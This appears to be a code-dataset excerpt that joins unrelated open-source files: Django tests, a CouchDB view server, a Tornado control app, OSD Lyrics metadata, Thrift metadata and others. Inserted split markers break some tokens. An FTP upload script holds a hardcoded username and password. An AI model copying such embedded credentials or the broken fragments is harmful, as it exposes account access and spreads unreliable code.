def testConnectToBill(self):
self.assertTrue(self.client.login(username='jacob', password='JKM'))
res = self.client.post(reverse('committee-meeting',
kwargs={'pk':
self.meeting_1.id}),
{'user_input_type': 'bill',
'bill_id': self.bill_1.id})
self.assertEqual(res.status_code, 302)
self.assertTrue(self.bill_1 in self.meeting_1.bills_first.all())
self.client.logout()
def tearDown(self):
self.meeting_1.delete()
self.meeting_2.delete()
self.committee_1.delete()
self.committee_2.delete()
self.jacob.delete()
self.group.delete()
self.bill_1.delete()
self.mk_1.delete()
|
tic-ull/defensatfc-proto | tfc_webapps/packages/suds-timestamp/tests/saxenc.py | Python | agpl-3.0 | 1,564 | 0.002558 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
#
# sax encoding/decoding test.
#
from suds.sax.element import Element
from suds.sax.parser import Parser
xml = "<a>Me && <b>my</b> shadow's <i>dog</i> love to 'play' and sing "la,la,la";</a>"
p = Parser()
d = p.parse(string=xml)
a = d.root()
print 'A(parsed)=\n%s' % a
assert str(a) == xml
b = Element('a')
b.setText('Me && <b>my</b> shadow\'s <i>dog</i> lov | e to \'play\' and sing "la,la,la";')
print 'B(encoded)=\n%s' % b
assert str(b) == xml
print 'A(text-decoded)=\n%s' % a.getText()
print 'B(text-decoded)=\n%s' % b.getText()
assert a.getText() == b.getText()
print 'test pruning'
j = Element('A')
j.set('n', 1)
j.append(El | ement('B'))
print j
j.prune()
print j |
AoLab/SIMP | siml.py | Python | gpl-3.0 | 1,096 | 0 | #!/usr/bin/env python3
# In The Name Of God
# ========================================
# [] File Name : siml.py
#
# [] Creation Date : 27-04-2017
#
# [] Created By : Pa | rham Alvani (parham.alvani@gmail.com)
# =======================================
import click
import yaml
import os
models = {}
def load(package):
for root, dirs, files in os.walk(package):
for model_file in files:
with open(os.path.join(root, model_file), 'r') as f:
try:
model = yaml.load(f)
if model['package'] != '.%s' % root.replace('/', '.'):
| continue
click.echo('%s.%s' % (model['package'], model['name']))
models['%s.%s' % (model['package'], model['name'])] = model
except Exception:
pass
for model_package in dirs:
load(model_package)
@click.command()
@click.option('--package', prompt="SIML package", help='Target SIML package')
def load_cmd(package):
load(package)
if __name__ == '__main__':
load_cmd()
|
laroque/couchdb-python3 | couchdb/view.py | Python | bsd-3-clause | 7,191 | 0.000139 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2008 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
"""Implementation of a view server for functions written in Python."""
from codecs import BOM_UTF8
import logging
import os
import sys
import traceback
from types import FunctionType
fr | om couchdb import json
__all__ = ['main', 'run']
__docformat__ = 'restructuredtext en'
log = logging.getLogger('couchdb.view')
def run(input=sys.stdin, output=sys.stdout):
r"""CouchDB view function handler implementation for Python.
:param input: the readable file-like object to read input from
:param output: the writable file-like object to write output to
"""
functions = []
def _writej | son(obj):
obj = json.encode(obj)
output.write(obj)
output.write('\n')
output.flush()
def _log(message):
if not isinstance(message, str):
message = json.encode(message)
_writejson({'log': message})
def reset(config=None):
del functions[:]
return True
def add_fun(string):
string = BOM_UTF8 + string.encode('utf-8')
globals_ = {}
try:
exec(string, {'log': _log}, globals_)
except Exception as e:
return {'error': {
'id': 'map_compilation_error',
'reason': e.args[0]
}}
err = {'error': {
'id': 'map_compilation_error',
'reason': 'string must eval to a function '
'(ex: "def(doc): return 1")'
}}
if len(globals_) != 1:
return err
function = list(globals_.values())[0]
if type(function) is not FunctionType:
return err
functions.append(function)
return True
def map_doc(doc):
results = []
for function in functions:
try:
results.append([[key, value] for key, value in function(doc)])
except Exception as e:
log.error('runtime error in map function: %s', e,
exc_info=True)
results.append([])
_log(traceback.format_exc())
return results
def reduce(*cmd, **kwargs):
code = BOM_UTF8 + cmd[0][0].encode('utf-8')
args = cmd[1]
globals_ = {}
try:
exec(code, {'log': _log}, globals_)
except Exception as e:
log.error('runtime error in reduce function: %s', e,
exc_info=True)
return {'error': {
'id': 'reduce_compilation_error',
'reason': e.args[0]
}}
err = {'error': {
'id': 'reduce_compilation_error',
'reason': 'string must eval to a function '
'(ex: "def(keys, values): return 1")'
}}
if len(globals_) != 1:
return err
function = list(globals_.values())[0]
if type(function) is not FunctionType:
return err
rereduce = kwargs.get('rereduce', False)
results = []
if rereduce:
keys = None
vals = args
else:
if args:
keys, vals = list(zip(*args))
else:
keys, vals = [], []
if function.__code__.co_argcount == 3:
results = function(keys, vals, rereduce)
else:
results = function(keys, vals)
return [True, [results]]
def rereduce(*cmd):
# Note: weird kwargs is for Python 2.5 compat
return reduce(*cmd, **{'rereduce': True})
handlers = {'reset': reset, 'add_fun': add_fun, 'map_doc': map_doc,
'reduce': reduce, 'rereduce': rereduce}
try:
while True:
line = input.readline()
if not line:
break
try:
cmd = json.decode(line)
log.debug('Processing %r', cmd)
except ValueError as e:
log.error('Error: %s', e, exc_info=True)
return 1
else:
retval = handlers[cmd[0]](*cmd[1:])
log.debug('Returning %r', retval)
_writejson(retval)
except KeyboardInterrupt:
return 0
except Exception as e:
log.error('Error: %s', e, exc_info=True)
return 1
_VERSION = """%(name)s - CouchDB Python %(version)s
Copyright (C) 2007 Christopher Lenz <cmlenz@gmx.de>.
"""
_HELP = """Usage: %(name)s [OPTION]
The %(name)s command runs the CouchDB Python view server.
The exit status is 0 for success or 1 for failure.
Options:
--version display version information and exit
-h, --help display a short help message and exit
--json-module=<name> set the JSON module to use ('simplejson', 'cjson',
or 'json' are supported)
--log-file=<file> name of the file to write log messages to, or '-' to
enable logging to the standard error stream
--debug enable debug logging; requires --log-file to be
specified
Report bugs via the web at <http://code.google.com/p/couchdb-python>.
"""
def main():
"""Command-line entry point for running the view server."""
import getopt
from couchdb import __version__ as VERSION
try:
option_list, argument_list = getopt.gnu_getopt(
sys.argv[1:], 'h',
['version', 'help', 'json-module=', 'debug', 'log-file=']
)
message = None
for option, value in option_list:
if option in ('--version'):
message = _VERSION % dict(name=os.path.basename(sys.argv[0]),
version=VERSION)
elif option in ('-h', '--help'):
message = _HELP % dict(name=os.path.basename(sys.argv[0]))
elif option in ('--json-module'):
json.use(module=value)
elif option in ('--debug'):
log.setLevel(logging.DEBUG)
elif option in ('--log-file'):
if value == '-':
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter(
' -> [%(levelname)s] %(message)s'
))
else:
handler = logging.FileHandler(value)
handler.setFormatter(logging.Formatter(
'[%(asctime)s] [%(levelname)s] %(message)s'
))
log.addHandler(handler)
if message:
sys.stdout.write(message)
sys.stdout.flush()
sys.exit(0)
except getopt.GetoptError as error:
message = '%s\n\nTry `%s --help` for more information.\n' % (
str(error), os.path.basename(sys.argv[0])
)
sys.stderr.write(message)
sys.stderr.flush()
sys.exit(1)
sys.exit(run())
if __name__ == '__main__':
main()
|
ctogle/dilapidator | src/dilap/BROKEN/destruct.py | Python | mit | 951 | 0.010515 | import dilap.core.uinfo as di
import dilap.core.sgraph as dsg
import dilap.core.model as dm
import dilap.io.io as dio
import dilap.degenerate.overgrown as dog
import pdb
iotypes = dio.iotypes
###############################################################################
### simple functions which return simple dilapidors
###############################################################################
def overgrown(z_max = 10):
ivy = dog.ivy(z_max = z_max)
return ivy
###############################################################################
### convenient collections of functions
############################################## | #################################
# dilapidors is a dict of funcs which return dilapidor objects
d | ilapidors = {
'ivy':overgrown,
}
###############################################################################
|
lamotriz/lavagem-a-seco | src/main.py | Python | gpl-2.0 | 8,904 | 0.005759 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# PROJETO LAVAGEM A SECO
#
# MAIN
#
# Felipe Bandeira da Silva
# 26 jul 15
#
import logging
import tornado.escape
import tornado.ioloop
import tornado.web
import tornado.options
import tornado.websocket
import tornado.httpserver
import os.path
from tornado.concurrent import Future
from tornado import gen
from tornado.options import define, options, parse_command_line
import socket
import fcntl
import struct
import random
define("port", default=8888, help="run on the given port", type=int)
define("debug", default=False, help="run in debug mode")
import multiprocessing
import controle
import time
import os
import signal
import subprocess
import sys
from platform import uname
#NAVEGADOR = 'epiphany'
NAVEGADOR = 'midori -e Fullscreen -a'
# A pagina HTML contém informações interessantes e que devem ser
# apresentadas ao usuário. Quanto menor o tempo maior o processamento
# por parte do cliente ou dependendo do caso pelo servidor.
TEMPO_MS_ATUALIZACAO_HTML = 500
# Via websocket é possível mais um cliente conectado e todos devem
# receber as mensagens do servidor, bem como enviar.
# clientes do websocket
clients = []
# tarefa para atualizacao do pagina html
queue_joyx = multiprocessing.Queue()
queue_joyy = multipr | ocessing.Queue()
queue_joyz = multiprocessing.Queue()
# anemometro
queue_velocidade = multiprocessing.Queue()
queue_direcao = multiprocessing.Queue()
queue_distancia = multiprocessing.Queue()
# usado para o controle da página pelo joystick
queue_joy_botoes = multiprocessing.Queue()
#class NavegadorWEB(multiprocessi | ng.Process):
# def __init__(self):
# multiprocessing.Process.__init__(self)
#
# self.navegador = subprocess.Popen(['epiphany-browser 192.168.42.1:8888'], stdout=subprocess.PIPE, \
# shell=True, preexec_fn=os.setsid)
#
# def run(self):
# while True:
# time.sleep(0.01)
def inicia_navegador():
navegador = subprocess.Popen([NAVEGADOR+' 192.168.42.1:8888'], \
stdout=subprocess.PIPE, \
shell=True, preexec_fn=os.setsid)
def fecha_navegador():
processos = subprocess.Popen(['pgrep', NAVEGADOR], stdout=subprocess.PIPE)
print 'PID dos processos', processos.stdout
for pid in processos.stdout:
os.kill(int(pid), signal.SIGTERM)
try:
time.sleep(3)
os.kill(int(pid), 0)
print u'erro: o processo %d ainda existe' % pid
except OSError as ex:
continue
def get_ip_address():
# Informa o endereço IP da primeira conexão funcionando
# visto em:
# http://code.activestate.com/recipes/439094-get-the-ip-address-associated-with-a-network-inter/
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
ifname = 'eth0'
return socket.inet_ntoa(fcntl.ioctl( \
s.fileno(), \
0x8915, # SIOCGIFADDR \
struct.pack('256s', ifname[:15]) \
)[20:24])
except:
try:
ifname = 'wlan0'
return socket.inet_ntoa(fcntl.ioctl( \
s.fileno(), \
0x8915, # SIOCGIFADDR \
struct.pack('256s', ifname[:15]) \
)[20:24])
except:
return "127.0.0.1"
def get_ip_address_interface(ifname):
# Informa o endereço de IP de uma rede <ifname>
# visto em:
# http://code.activestate.com/recipes/439094-get-the-ip-address-associated-with-a-network-inter/
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
return socket.inet_ntoa(fcntl.ioctl( \
s.fileno(), \
0x8915, # SIOCGIFADDR \
struct.pack('256s', ifname[:15]) \
)[20:24])
except:
return "0.0.0.0"
class MainHandler(tornado.web.RequestHandler):
# Atende ao GET e POST do cliente
def get(self):
# é possível via argumento renderizar a página html com
# informações interessantes, os comentários devem ter o mesmo
# nome da variável da página
self.render("index.html", title="LAVAGEM A SECO", \
ip_host=get_ip_address()+":"+str(options.port), \
msg_status="LIGADO")
class WebSocketHandler(tornado.websocket.WebSocketHandler):
# Todo cliente se encarrega de conectar-se ao servidor websocket.
# Quando existe uma nova conexão é salvo qual cliente foi.
def open(self):
print 'tornado: websocket: aviso: nova conexão de um cliente'
clients.append(self)
self.write_message("connected")
# Quando um cliente envia uma mensagem, esta é a função responsável
# por ler e aqui deve ficar a chamada dos get das filas(queue)
def on_message(self, message):
print 'tornado: websocket: aviso: nova mensagem: %s' % message
q = self.application.settings.get('queue')
q.put(message)
# Para evitar envios de informações a clientes que não existem mais
# é necessário retirá-los da lista
def on_close(self):
print 'tornado: websocket: aviso: conexão finalizada/perdida'
clients.remove(self)
fecha_navegador()
inicia_navegador()
def envia_cmd_websocket(cmd, arg):
# Facilita o trabalho repetitivo de envia mensagem para todo os clientes
# Envia um comando e seu argumento para todos os clientes
for c in clients:
c.write_message(cmd+";"+arg)
def tarefa_atualizacao_html():
# Esta função tem uma chamada periódica, responsável por atualizar os
# elementos atualizáveis na página html
envia_cmd_websocket("lan", get_ip_address())
envia_cmd_websocket("random", str(random.randint(0,1000)))
# para envia algo é necessário que fila tenha algo
if not queue_joyx.empty():
resultado = queue_joyx.get()
envia_cmd_websocket("joyx", str(resultado)[:6])
if not queue_joyy.empty():
resultado = queue_joyy.get()
envia_cmd_websocket("joyy", str(resultado)[:6])
if not queue_joyz.empty():
resultado = queue_joyz.get()
envia_cmd_websocket("joyz", str(resultado)[:6])
if not queue_joy_botoes.empty():
resultado = queue_joy_botoes.get()
envia_cmd_websocket("b", str(resultado))
if not queue_velocidade.empty():
resultado = queue_velocidade.get()
envia_cmd_websocket("v", str(resultado))
if not queue_direcao.empty():
resultado = queue_direcao.get()
envia_cmd_websocket("d", str(resultado))
if not queue_distancia.empty():
resultado = queue_distancia.get()
envia_cmd_websocket("x", str(resultado)[:6])
def main():
print u"Iniciando o servidor Tornado"
fecha_navegador()
tarefa_controle = multiprocessing.Queue()
# esse loop ler os dados do joystick e envia para o lavos
# sem ele, nenhuma resposta do Joystick é atendida.
controle_loop = controle.ControleLavagem(tarefa_controle, \
queue_joyx, \
queue_joyy, \
queue_joyz, \
queue_joy_botoes, \
queue_velocidade, \
queue_direcao, \
queue_distancia)
controle_loop.daemon = True
controle_loop.start()
# espera um pouco para que a tarefa esteja realmente pronta
# sincronismo é mais interessante?
time.sleep(1)
tarefa_controle.put("Testando Tarefa :)")
parse_command_line()
app = tornado.web.Application(
[
(r"/", MainHandler),
(r"/ws", WebSocketHandler)
],
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=True,
debug=options.debug,
autoreload=True,
queue=tarefa_controle,
)
# porta que o serv |
tommasoberlose/p2p_gnutella | Constant.py | Python | mit | 610 | 0.001639 | PORT = "3000"
LENGTH_PORT = 5
TTL = "2"
LENGTH_TTL = 2
ERROR_PKT = "0000"
LIST_PKT = []
LENGTH_PKTID = 16
LENGTH_FILENAME = 100
LENGTH_QUERY = 20
LENGTH_SECTION_IPV4 = 3
LENGTH_SECTION_IPV6 = | 4
LENGTH_PACK = 1024
LENGTH_NCHUNK = 5
| LENGTH_NCHUNKS = 6
LENGTH_HEADER = 10
CODE_QUERY = "QUER"
CODE_ANSWER_QUERY = "AQUE"
CODE_NEAR = "NEAR"
CODE_ANSWER_NEAR = "ANEA"
CODE_DOWNLOAD = "RETR"
CODE_ANSWER_DOWNLOAD = "ARET"
CODE_LOGO = "LOGO"
FILE_COND = "FileCondivisi/"
ERROR_FILE = "FILE_NOT_FOUND"
NUM_NEIGHBOR = 3
START_RED = "\033[91m"
END_RED = "\033[0m"
START_GREEN = "\033[92m"
END_GREEN = "\033[0m" |
osdlyrics/osdlyrics | python/metadata.py | Python | gpl-3.0 | 13,271 | 0.000678 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Tiger Soldier
#
# This file is part of OSD Lyrics.
#
# OSD Lyrics is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OSD Lyrics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OSD Lyrics. If not, see <https://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from builtins import object
import logging
import re
import dbus
from .consts import METADATA_ALBUM, METADATA_ARTIST, METADATA_TITLE
class Metadata(object):
"""
Metadata of a track
This class helps to deal with different metadata formats defined by MPRIS1,
MPRIS2 and OSD Lyrics. It is recommended to parse a metadata dict from D-Bus
with `Metadata.from_dict()`.
Metadata provides following properties: `title`, `artist`, `album`, `location`,
`arturl`, `length`, and `tracknum`, where `length` and `tracknum` are integers,
the others are strings.
"""
# Possible MPRIS metadata keys, taken from
# http://xmms2.org/wiki/MPRIS_Metadata#MPRIS_v1.0_Metadata_guidelines"""
MPRIS1_KEYS = set(['genre', 'comment', 'rating', 'year', 'date', 'asin',
'puid fingerprint', 'mb track id', 'mb artist id',
'mb artist sort name', 'mb album id', 'mb release date',
'mb album artist', 'mb album artist id',
'mb album artist sort name', 'audio-bitrate',
'audio-samplerate', 'video-bitrate'])
# Possible MPRIS2 metadata keys, taken from
# http://www.freedesktop.org/wiki/Specifications/mpris-spec/metadata
MPRIS2_KEYS = set(['xesam:albumArtist', 'xesam:asText', 'xesam:audioBPM',
'xesam:autoRating', 'xesam:comment', 'xesam:composer',
'xesam:contentCreated', 'xesam:discNumber', 'xesam:firstUsed',
'xesam:genre', 'xesam:lastUsed', 'xesam:lyricist',
'xesam:useCount', 'xesam:userRating'])
def __init__(self,
title=None,
artist=None,
album=None,
arturl=None,
tracknum=-1,
location=None,
length=-1,
extra={}):
"""
Create a new Metadata instance.
| Arguments:
- `title`: (string) The title of the track
- `artist`: (string) The artist of the track
- `album`: (string) The name of album that the track is in
- `arturl`: (string) The URI of the picture of the cover of the album
- `tracknum`: (int) The number of the track
- `location`: (string) The URI of the file
| - `length`: (int) The duration of the track in milliseconds.
- `extra`: (dict) A dict that is intend to store additional properties
provided by MPRIS1 or MPRIS2 DBus dicts. The MPRIS1-related
values will be set in the dict returned by `to_mpris1`. The
MPRIS2-related values are treated in a similar way.
"""
self.title = title
self.artist = artist
self.album = album
self.arturl = arturl
self.tracknum = tracknum
self.location = location
self.length = length
self._extra = extra
def __eq__(self, other):
"""
Two metadatas are equal if:
- The locations are not empty and are equal, or
- The titles, artists and albums are equal.
See also: src/ol_metadata.c:ol_metadata_equal, thougn they aren't consistent.
"""
if self is other:
return True
if self.location == other.location and self.location != '':
return True
for key in [METADATA_TITLE, METADATA_ARTIST, METADATA_ALBUM]:
if getattr(self, key) != getattr(other, key):
return False
return True
def to_mpris1(self):
"""
Converts the metadata to mpris1 dict
"""
ret = dbus.Dictionary(signature='sv')
for k in ['title', 'artist', 'album', 'arturl', 'location']:
if getattr(self, k) is not None:
ret[k] = dbus.String(getattr(self, k))
if self.tracknum >= 0:
ret['tracknumber'] = dbus.String(self.tracknum)
if self.length >= 0:
ret['time'] = dbus.UInt32(self.length // 1000)
ret['mtime'] = dbus.UInt32(self.length)
for k, v in self._extra.items():
if k in self.MPRIS1_KEYS and k not in ret:
ret[k] = v
return ret
def to_mpris2(self):
"""
Converts the metadata to mpris2 dict
>>> mt = Metadata(title='Title', artist='Artist1, Artist2,Artist3',
... album='Album', arturl='file:///art/url',
... location='file:///path/to/file', length=123,
... tracknum=456,
... extra={ 'title': 'Fake Title',
... 'xesam:album': 'Fake Album',
... 'xesam:useCount': 780,
... 'xesam:userRating': 1.0,
... 'custom value': 'yoooooo',
... })
>>> dict = mt.to_mpris2()
>>> print(dict['xesam:title'])
Title
>>> print(dict['xesam:artist'])
[dbus.String('Artist1'), dbus.String('Artist2'), dbus.String('Artist3')]
>>> print(dict['xesam:url'])
file:///path/to/file
>>> print(dict['mpris:artUrl'])
file:///art/url
>>> print(dict['mpris:length'])
123
>>> print(dict['xesam:trackNumber'])
456
>>> print(dict['xesam:userRating'])
1.0
>>> 'custom value' in dict
False
>>> mt2 = Metadata.from_dict(dict)
>>> print(mt2.title)
Title
>>> print(mt2.artist)
Artist1, Artist2, Artist3
>>> print(mt2.album)
Album
>>> print(mt2.location)
file:///path/to/file
"""
ret = dbus.Dictionary(signature='sv')
mpris2map = {'title': 'xesam:title',
'album': 'xesam:album',
'arturl': 'mpris:artUrl',
'location': 'xesam:url',
}
for k in ['title', 'album', 'arturl', 'location']:
if getattr(self, k) is not None:
ret[mpris2map[k]] = dbus.String(getattr(self, k))
if self.artist is not None:
ret['xesam:artist'] = [dbus.String(v.strip()) for v in self.artist.split(',')]
if self.length >= 0:
ret['mpris:length'] = dbus.Int64(self.length)
if self.tracknum >= 0:
ret['xesam:trackNumber'] = dbus.Int32(self.tracknum)
for k, v in self._extra.items():
if k in self.MPRIS2_KEYS and k not in ret:
ret[k] = v
return ret
@classmethod
def from_mpris2(cls, mpris2_dict):
"""
Create a Metadata object from mpris2 metadata dict
"""
string_dict = {'title': 'xesam:title',
'album': 'xesam:album',
'arturl': 'mpris:artUrl',
'location': 'xesam:url',
}
string_list_dict = {'artist': 'xesam:artist'}
kargs = {}
for k, v in string_dict.items():
if v in mpris2_dict:
kargs[k] = mpris2_dict[v]
for k, v in string_list_dict.items():
if v in mpris2_dict:
kargs[k] = ', '.join(mpris2_dict[v])
if 'xesam:trackNumber' in mpris2_dict:
kargs['tracknum'] = int(mpris2_dict['xesam:trackNumber'])
if |
ACLARKNET/aclarknet-database | aclarknet/database/migrations/0040_auto_20170902_1841.py | Python | mit | 694 | 0 | # -*- coding: utf-8 -*-
# Generated b | y Django 1.11.4 on 2017-09-02 22:41
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('database', '0039_auto_20170902_1834'),
]
operations = [
migrations.RemoveField(
model_name='companysettings',
name='note',
),
migrations.Remo | veField(
model_name='service',
name='company',
),
migrations.RemoveField(
model_name='testimonial',
name='company',
),
migrations.DeleteModel(
name='CompanySettings',
),
]
|
chrisRubiano/TAP | dolar/ftp.py | Python | gpl-3.0 | 494 | 0.004049 | from __future__ import print_function
import os
from ftplib import FTP
def place_file(ftp, filename):
ftp.storbinary('STOR ' + filename,open(fi | lename, 'rb'))
if __name__ == '__main__':
url = 'ftp.k-bits.com'
ftp = FTP(url)
user = 'usuario1@k-bits.com'
passw = 'happy1234'
ftp.login(user, passw)
remoto = []
ftp.dir(remoto.append)
for r in remoto:
print(r)
directorio_local = os.listdir( | '.')
place_file(ftp, 'Banamex.csv')
ftp.quit()
|
facebook/fbthrift | thrift/compiler/test/fixtures/basic/gen-py3lite/module/lite_metadata.py | Python | apache-2.0 | 13,649 | 0.010697 | #
# Autogenerated by Thrift
#
# DO NOT EDIT
# @generated
#
import apache.thrift.metadata.lite_types as _fbthrift_metadata
# TODO (ffrancet): This general pattern can be optimized by using tuples and dicts
# instead of re-generating thrift structs
def _fbthrift_gen_metadata_struct_MyStruct(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyStruct"
if qualified_name in metadata_struct.structs:
return metadata_struct
fields = [
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="MyIntField", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=2, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_STRING_TYPE), name="MyStringField", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=3, type=_fbthrift_metadata.ThriftType(t_struct=_fbthrift_metadata.ThriftStructType(name="module.MyDataItem")), name="MyDataField", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=4, type=_fbthrift_metadata.ThriftType(t_enum=_fbthrift_metadata.ThriftEnumType(name="module.MyEnum")), name="myEnum", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=5, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), name="oneway", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=6, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), name="readonly", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=7, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), name="idempotent", is_optional=False, structured_annotations=[
]),
]
struct_dict = dict(metadata_struct.structs)
struct_dict[qualified_name] = _fbthrift_metadata.ThriftStruct(name=qualified_name, fields=fields,
is_union=False,
structured_annotations=[
])
new_struct = metadata_struct(structs=struct_dict)
# MyIntField
# MyStringField
new_struct = _fbthrift_gen_metadata_struct_MyDataItem(new_struct) # MyDataField
new_struct = _fbthrift_gen_metadata_enum_MyEnum(new_struct) # myEnum
# oneway
# readonly
# idempotent
return new_struct
def gen_metadata_struct_MyStruct() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_struct_MyStruct(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
# TODO (ffrancet): This general pattern can be optimized by using | tuples and dicts
# instead of re-generating thrift structs
def _fbthrift_gen_metadata_struct_MyDataItem(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyDataItem"
if qual | ified_name in metadata_struct.structs:
return metadata_struct
fields = [
]
struct_dict = dict(metadata_struct.structs)
struct_dict[qualified_name] = _fbthrift_metadata.ThriftStruct(name=qualified_name, fields=fields,
is_union=False,
structured_annotations=[
])
new_struct = metadata_struct(structs=struct_dict)
return new_struct
def gen_metadata_struct_MyDataItem() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_struct_MyDataItem(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
# TODO (ffrancet): This general pattern can be optimized by using tuples and dicts
# instead of re-generating thrift structs
def _fbthrift_gen_metadata_struct_MyUnion(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyUnion"
if qualified_name in metadata_struct.structs:
return metadata_struct
fields = [
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_enum=_fbthrift_metadata.ThriftEnumType(name="module.MyEnum")), name="myEnum", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=2, type=_fbthrift_metadata.ThriftType(t_struct=_fbthrift_metadata.ThriftStructType(name="module.MyStruct")), name="myStruct", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=3, type=_fbthrift_metadata.ThriftType(t_struct=_fbthrift_metadata.ThriftStructType(name="module.MyDataItem")), name="myDataItem", is_optional=False, structured_annotations=[
]),
]
struct_dict = dict(metadata_struct.structs)
struct_dict[qualified_name] = _fbthrift_metadata.ThriftStruct(name=qualified_name, fields=fields,
is_union=True,
structured_annotations=[
])
new_struct = metadata_struct(structs=struct_dict)
new_struct = _fbthrift_gen_metadata_enum_MyEnum(new_struct) # myEnum
new_struct = _fbthrift_gen_metadata_struct_MyStruct(new_struct) # myStruct
new_struct = _fbthrift_gen_metadata_struct_MyDataItem(new_struct) # myDataItem
return new_struct
def gen_metadata_struct_MyUnion() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_struct_MyUnion(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
def gen_metadata_service_MyService() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_service_MyService(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
def _fbthrift_gen_metadata_service_MyService(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyService"
if qualified_name in metadata_struct.services:
return metadata_struct
functions = [
_fbthrift_metadata.ThriftFunction(name="ping", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_VOID_TYPE), arguments=[
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="getRandomData", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_STRING_TYPE), arguments=[
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="sink", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_VOID_TYPE), arguments=[
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="sink", is_optional=False, structured_annotations=[
]),
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="putDataById", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_VOID_TYPE), arguments=[
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="id", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=2, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_STRING_TYPE), name="data", is_optional=False, structured_annotations=[
]),
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="hasDataById", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), arguments=[
